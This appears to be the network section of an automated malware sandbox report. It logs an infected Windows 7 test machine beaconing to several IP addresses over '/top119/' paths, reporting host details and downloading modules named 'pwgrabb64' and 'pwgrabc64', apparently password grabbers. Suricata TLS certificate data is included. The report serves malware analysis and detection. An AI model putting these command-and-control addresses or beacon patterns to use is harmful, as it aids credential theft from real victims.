Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| icanhazip.com | 104.18.6.156 |
GET
200
https://179.189.229.254/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/5/file/
REQUEST
RESPONSE
BODY
GET /top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/5/file/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 179.189.229.254
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:41:20 GMT
Content-Type: application/octet-stream
Content-Length: 224
Connection: keep-alive
GET
200
https://179.189.229.254/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/W86mMKPIM801nj2bSV6zifCFnf/
REQUEST
RESPONSE
BODY
GET /top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/W86mMKPIM801nj2bSV6zifCFnf/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 179.189.229.254
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:41:21 GMT
Content-Type: text/plain
Content-Length: 730
Connection: keep-alive
GET
200
https://179.189.229.254/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/exc/E:%200xc0000005%20A:%200x0000000077919A5A/0/
REQUEST
RESPONSE
BODY
GET /top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/exc/E:%200xc0000005%20A:%200x0000000077919A5A/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 179.189.229.254
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:41:22 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://179.189.229.254/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/user/test22/0/
REQUEST
RESPONSE
BODY
GET /top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/user/test22/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 179.189.229.254
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:41:23 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://179.189.229.254/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/path/C:%5CUsers%5Ctest22%5CAppData%5CLocal%5CTemp%5Ctooltipred.png/0/
REQUEST
RESPONSE
BODY
GET /top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/path/C:%5CUsers%5Ctest22%5CAppData%5CLocal%5CTemp%5Ctooltipred.png/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 179.189.229.254
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:41:23 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://179.189.229.254/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/NAT%20status/client%20is%20behind%20NAT/0/
REQUEST
RESPONSE
BODY
GET /top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/NAT%20status/client%20is%20behind%20NAT/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 179.189.229.254
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:41:24 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://5.152.175.57/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/5/pwgrabb64/
REQUEST
RESPONSE
BODY
GET /top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/5/pwgrabb64/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 5.152.175.57
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Fri, 27 Aug 2021 06:41:29 GMT
Content-Type: application/octet-stream
Content-Length: 771952
Last-Modified: Mon, 23 Aug 2021 15:12:36 GMT
Connection: keep-alive
ETag: "6123bae4-bc770"
Accept-Ranges: bytes
GET
200
https://179.189.229.254/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/5/file/
REQUEST
RESPONSE
BODY
GET /top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/5/file/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 179.189.229.254
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:41:53 GMT
Content-Type: application/octet-stream
Content-Length: 224
Connection: keep-alive
GET
200
https://179.189.229.254/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/8uMoLXFfUKElAG6M7lPr/
REQUEST
RESPONSE
BODY
GET /top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/8uMoLXFfUKElAG6M7lPr/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 179.189.229.254
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:41:54 GMT
Content-Type: text/plain
Content-Length: 724
Connection: keep-alive
GET
200
https://179.189.229.254/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/exc/E:%200xc0000005%20A:%200x0000000077919A5A/0/
REQUEST
RESPONSE
BODY
GET /top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/exc/E:%200xc0000005%20A:%200x0000000077919A5A/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 179.189.229.254
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:41:55 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://179.189.229.254/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/user/test22/0/
REQUEST
RESPONSE
BODY
GET /top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/user/test22/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 179.189.229.254
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:41:56 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://179.189.229.254/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/NAT%20status/client%20is%20behind%20NAT/0/
REQUEST
RESPONSE
BODY
GET /top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/NAT%20status/client%20is%20behind%20NAT/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 179.189.229.254
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:41:56 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://97.83.40.67/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/5/file/
REQUEST
RESPONSE
BODY
GET /top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/5/file/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 97.83.40.67
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:41:59 GMT
Content-Type: application/octet-stream
Content-Length: 224
Connection: keep-alive
GET
200
https://97.83.40.67/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/b5Jb57X3TvfZJdxFT53d/
REQUEST
RESPONSE
BODY
GET /top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/b5Jb57X3TvfZJdxFT53d/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 97.83.40.67
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:42:00 GMT
Content-Type: text/plain
Content-Length: 724
Connection: keep-alive
GET
200
https://97.83.40.67/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/exc/E:%200xc0000005%20A:%200x0000000077919A5A/0/
REQUEST
RESPONSE
BODY
GET /top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/exc/E:%200xc0000005%20A:%200x0000000077919A5A/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 97.83.40.67
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:42:01 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://97.83.40.67/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/user/test22/0/
REQUEST
RESPONSE
BODY
GET /top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/user/test22/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 97.83.40.67
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:42:01 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://97.83.40.67/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/NAT%20status/client%20is%20behind%20NAT/0/
REQUEST
RESPONSE
BODY
GET /top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/NAT%20status/client%20is%20behind%20NAT/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 97.83.40.67
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:42:02 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
403
https://97.83.40.67/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/10/62/CETDHVSBTPT/7/
REQUEST
RESPONSE
BODY
GET /top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/10/62/CETDHVSBTPT/7/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 97.83.40.67
HTTP/1.1 403 Forbidden
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:42:02 GMT
Content-Length: 9
Connection: keep-alive
GET
200
https://5.152.175.57/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/5/pwgrabc64/
REQUEST
RESPONSE
BODY
GET /top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/5/pwgrabc64/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 5.152.175.57
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Fri, 27 Aug 2021 06:42:25 GMT
Content-Type: application/octet-stream
Content-Length: 513392
Last-Modified: Mon, 23 Aug 2021 15:12:55 GMT
Connection: keep-alive
ETag: "6123baf7-7d570"
Accept-Ranges: bytes
GET
200
http://icanhazip.com/
REQUEST
RESPONSE
BODY
GET / HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: icanhazip.com
HTTP/1.1 200 OK
Date: Fri, 27 Aug 2021 06:41:21 GMT
Content-Type: text/plain
Content-Length: 16
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET
Set-Cookie: __cf_bm=fb881d842e217bac9a9438b887d50b65fc4e7c13-1630046481-1800-AegPiKfgaRsd0K8PH6L5y70Fya2OVCdZWIRv49SWPmqKCUpEqTei8vp94PBlNuz8QykZ0R/jhtFB7/Uh2/+BYUU=; path=/; expires=Fri, 27-Aug-21 07:11:21 GMT; domain=.icanhazip.com; HttpOnly; SameSite=None
Server: cloudflare
CF-RAY: 6853504c5d9112ca-ICN
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
| Flow | Issuer | Subject | Fingerprint |
|---|---|---|---|
|
TLSv1 192.168.56.102:49168 5.152.175.57:443 |
C=US, ST=IL, L=Chicago, O=Internet Widgits Pty Ltd | C=US, ST=IL, L=Chicago, O=Internet Widgits Pty Ltd | 30:21:9a:cd:06:f2:ba:20:f6:0b:3c:54:ec:08:35:d0:9d:4b:e8:50 |
|
TLSv1 192.168.56.102:49166 179.189.229.254:443 |
C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | b5:21:a8:16:d5:97:b1:67:f6:60:a5:cb:20:27:76:ec:3c:9d:3b:02 |
|
TLSv1 192.168.56.102:49171 97.83.40.67:443 |
C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | b5:21:a8:16:d5:97:b1:67:f6:60:a5:cb:20:27:76:ec:3c:9d:3b:02 |
Snort Alerts
No Snort Alerts